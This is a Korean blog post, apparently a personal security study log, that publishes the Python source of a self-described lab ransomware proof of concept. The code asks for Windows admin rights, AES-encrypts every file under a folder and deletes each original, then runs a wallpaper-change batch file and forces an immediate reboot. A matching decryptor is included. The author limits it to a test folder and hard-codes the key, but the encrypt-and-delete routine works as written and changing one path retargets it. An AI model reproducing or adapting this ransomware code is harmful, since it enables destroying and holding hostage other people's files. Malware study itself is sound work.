https://securitypositive.tistory.com/entry/Ransomware
https://github.com/KKongten/Ransomware
해당 글에서 랜섬웨어 관련 내용을 업로드 했었다.
본격적으로 연구를 위해 이전에 사용했었던 코드를 아래에 업로드 해볼까 한다. (아래 코드는 `startPath`에 고정된 테스트 폴더만 대상으로 하는 실습용 PoC이며, AES 키가 소스에 하드코딩되어 있어 스크립트를 가진 사람은 누구나 복호화할 수 있다.)
import glob
import os
import struct
import subprocess
import sys

from Crypto.Cipher import AES
from PyQt5.QtCore import Qt
from PyQt5.QtGui import QIcon
from PyQt5.QtWidgets import QApplication, QWidget, QPushButton, QVBoxLayout, QHBoxLayout, QLabel
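def root_require() -> bool:
    """Re-launch this script elevated (Windows UAC "runas") unless it already is.

    The trailing ``asadmin`` argv marker is how the elevated child recognises
    itself: the only check is "last argv entry == marker". On a non-Windows
    host, or without pywin32 installed, the import fails and False is returned.

    Returns:
        True when this process already carries the marker, or when an elevated
        copy was launched; False when launching raised.

    NOTE(review): after a successful ShellExecuteEx the *unelevated* parent also
    returns True, so the caller's GUI comes up twice (here and in the elevated
    child). That matches the original behaviour; a caller that wants a single
    instance should exit when argv lacks the marker.
    """
    ASADMIN = 'asadmin'
    try:
        if sys.argv[-1] != ASADMIN:
            script = os.path.abspath(sys.argv[0])
            # list2cmdline applies Windows quoting rules, so a script path or an
            # argument containing spaces survives the trip through the shell
            # (a plain ' '.join split such values into several arguments).
            params = subprocess.list2cmdline([script] + sys.argv[1:] + [ASADMIN])
            # Imported lazily: pywin32 is Windows-only, and the original relied
            # on the name being imported in the __main__ block.
            from win32com.shell import shell
            shell.ShellExecuteEx(lpVerb='runas', lpFile=sys.executable, lpParameters=params)
        return True
    # Narrowed from a bare `except:`, which also swallowed SystemExit and
    # KeyboardInterrupt; the failure is reported instead of vanishing.
    except Exception as exc:
        print('root_require: elevation failed: %r' % (exc,), file=sys.stderr)
        return False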
def encrypt_file(key, in_filename, out_filename=None, chunksize=128*1024):
    """Encrypt *in_filename* with AES-CBC into *out_filename*.

    Output layout: 8-byte little-endian original size, 16-byte random IV, then
    the CBC ciphertext. The final chunk is right-padded with spaces up to a
    multiple of 32 bytes; ``decrypt_file`` trims that with the stored size, so
    the padding bytes carry no information.

    Args:
        key: raw AES key (16/24/32 bytes) passed straight to ``AES.new``; no
            key derivation is applied.
        in_filename: plaintext file, read ``chunksize`` bytes at a time.
        out_filename: destination; defaults to ``<in_filename>.ransomeware``
            and is created/truncated unconditionally.
        chunksize: bytes per read. Keep it a multiple of 16 (AES block size):
            only the last chunk is padded.

    Security notes (lab demo, not a format to reuse):
      * CBC without a MAC: ciphertext can be altered undetected and a wrong
        key decrypts to garbage silently.
      * The IV comes from ``os.urandom`` — correct for CBC.
      * The plaintext is left on disk; ``Encrypt_button`` unlinks it afterwards.
    """
    target = out_filename or (in_filename + '.ransomeware')
    iv = os.urandom(16)
    cipher = AES.new(key, AES.MODE_CBC, iv)
    original_size = os.path.getsize(in_filename)

    with open(in_filename, 'rb') as src, open(target, 'wb') as dst:
        # Header: the size used for truncation on decrypt, then the IV.
        dst.write(struct.pack('<Q', original_size))
        dst.write(iv)
        for block in iter(lambda: src.read(chunksize), b''):
            remainder = len(block) % 32
            if remainder:
                block += b' ' * (32 - remainder)
            dst.write(cipher.encrypt(block))
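def decrypt_file(key, in_filename, out_filename=None, chunksize=32*1024):
    """Reverse ``encrypt_file``: write the plaintext of *in_filename* to *out_filename*.

    Input layout (as written by ``encrypt_file``): 8-byte little-endian
    original size, 16-byte IV, then AES-CBC ciphertext. The output is
    truncated to the stored size, which drops the space padding added on
    encryption.

    Args:
        key: the raw AES key used for encryption.
        in_filename: the ``.ransomeware`` file to decrypt.
        out_filename: destination path; defaults to *in_filename* with its
            last extension stripped (``a.txt.ransomeware`` -> ``a.txt``).
        chunksize: bytes read per iteration; must be a multiple of 16.

    Raises:
        ValueError: the file is shorter than the 24-byte header, or the stored
            size exceeds the ciphertext that follows it. Both are rejected
            before the output file is created. (Previously a short file
            surfaced as ``struct.error``, and an oversize stored length made
            ``truncate`` *extend* the output with zero bytes.)
        ValueError: from the cipher, if a chunk is not a multiple of 16.

    Security note: CBC provides no integrity. A wrong key or a tampered
    ciphertext is not detected here; the result is simply garbage.
    """
    if not out_filename:
        out_filename = os.path.splitext(in_filename)[0]

    header_size = struct.calcsize('<Q') + 16
    total_size = os.path.getsize(in_filename)
    if total_size < header_size:
        raise ValueError('%s: %d bytes, shorter than the %d-byte size/IV header'
                         % (in_filename, total_size, header_size))

    with open(in_filename, 'rb') as infile:
        origsize = struct.unpack('<Q', infile.read(struct.calcsize('<Q')))[0]
        iv = infile.read(16)
        # CBC does not expand data, so the bytes after the header bound how much
        # plaintext can come out; a larger stored size means a truncated or
        # foreign file.
        if origsize > total_size - header_size:
            raise ValueError('%s: header claims %d bytes but only %d bytes of ciphertext follow'
                             % (in_filename, origsize, total_size - header_size))
        decryptor = AES.new(key, AES.MODE_CBC, iv)
        with open(out_filename, 'wb') as outfile:
            while True:
                chunk = infile.read(chunksize)
                if not chunk:
                    break
                outfile.write(decryptor.decrypt(chunk))
            # Drop the encryption-side space padding.
            outfile.truncate(origsize)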
# 16-byte value -> AES-128. Hard-coded and shipped inside the script, so anyone
# holding the script (or a memory dump of the process) can decrypt. Acceptable
# for a lab demo only; no derivation or key wrapping is applied anywhere.
key: bytes = b'Ransomware JIFS.'
# Recursive glob rooted at a fixed test folder ('**' + recursive=True walks
# sub-directories). Every regular file matched here is what the buttons below
# encrypt/delete or decrypt/delete.
startPath: str = 'C:/Users/user/Desktop/Ransomware/example/**'
def Encrypt_button():
    """Encrypt every accessible regular file under ``startPath``, then reboot.

    For each match: write ``<file>.ransomeware`` via ``encrypt_file`` with the
    module-level ``key``, then delete the original. Afterwards run the
    wallpaper batch file and force an immediate restart.

    The side effects are irreversible and not transactional: a crash between
    ``encrypt_file`` and ``os.remove`` leaves both copies, and ``os.remove``
    only unlinks (it does not overwrite), so the plaintext is presumably
    recoverable forensically until the blocks are reused. The batch-file path
    and the reboot command are hard-coded.
    """
    for filename in glob.iglob(startPath, recursive=True):
        if(os.path.isfile(filename)):
            # Requires R, W and X. NOTE(review): os.access on Windows is
            # documented to honour only existence/read-only, so X_OK likely
            # adds nothing here — confirm on the target platform.
            if (os.access(filename,os.R_OK)) and (os.access(filename,os.W_OK)) and (os.access(filename,os.X_OK)):
                print('Encrypting> ' + filename)
                encrypt_file(key, filename)
                os.remove(filename)
    # Fixed absolute paths through the shell; nothing here is built from input.
    os.system("C:/Users/user/Desktop/Ransomware/Wallpaper.bat")
    os.system("shutdown -r -t 0")
def Decrypt_button():
    """Decrypt every ``.ransomeware`` file under ``startPath``, then reboot.

    For each match: restore the plaintext via ``decrypt_file`` with the
    module-level ``key`` (output name = input minus its last extension), then
    delete the encrypted copy. Afterwards run the restore-wallpaper batch file
    and force an immediate restart.

    Not transactional: an exception from ``decrypt_file`` (e.g. a malformed
    file) propagates, aborting the loop and skipping the wallpaper/reboot
    step; files already processed stay decrypted. The batch-file path and the
    reboot command are hard-coded.
    """
    for filename in glob.iglob(startPath, recursive=True):
        if(os.path.isfile(filename)):
            # Only the extension is used for selection; `fname` is unused.
            fname, ext = os.path.splitext(filename)
            if (ext == '.ransomeware'):
                print('Decrypting> ' + filename)
                decrypt_file(key, filename)
                os.remove(filename)
    # Fixed absolute paths through the shell; nothing here is built from input.
    os.system("C:/Users/user/Desktop/Ransomware/Wallpaper1.bat")
    os.system("shutdown -r -t 0")
# GUI 관련 코드 (아래 __main__ 블록이 사용하는 ExWindow 등 PyQt5 창 정의) — 이 글에서는 생략
# ~~~~~~
#
if __name__ == '__main__':
    # pywin32 is imported here, under __main__, because root_require() reads the
    # module-global name `shell`; if that import fails (non-Windows, pywin32
    # missing) root_require() falls into its except branch and returns False.
    import win32com.shell.shell as shell
    if root_require():
        app = QApplication(sys.argv)
        # ExWindow comes from the GUI section omitted from this listing.
        ex = ExWindow()
        sys.exit(app.exec_())
    else:
        # Reached when the elevation attempt raised; the message does not say why.
        print ("error message")
이제 코드를 업데이트 하면서 변경할 것들을 계속해서 업로드 해볼까 한다.
그토록 하고싶어하는 "침해사고 분석" 은 기회가 없겠지만..
다음번에도 기회가 된다면..!
랜섬웨어 분석을 해보고 싶고, 실제로 도움이 되고 싶기 때문에 시간을 써볼것이다.